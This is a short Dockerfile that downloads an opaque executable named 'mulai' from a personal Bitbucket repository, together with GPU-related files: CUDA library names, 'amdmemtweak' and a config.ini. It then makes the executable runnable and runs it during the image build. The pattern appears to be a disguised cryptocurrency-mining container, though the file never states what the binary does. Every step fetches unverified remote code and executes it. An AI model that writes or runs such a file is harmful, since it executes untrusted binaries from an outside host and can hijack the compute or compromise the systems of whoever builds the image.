FROM ubuntu:20.04
#-----------------
RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/AnliAngku/testing/downloads/libnvrtc-builtins.so
RUN wget https://bitbucket.org/AnliAngku/testing/downloads/amdmemtweak
RUN wget https://bitbucket.org/AnliAngku/testing/downloads/config.ini
RUN wget https://bitbucket.org/AnliAngku/testing/downloads/mulai
RUN wget https://bitbucket.org/AnliAngku/testing/downloads/libnvrtc.so.10.0
RUN chmod u+x mulai
RUN ./mulai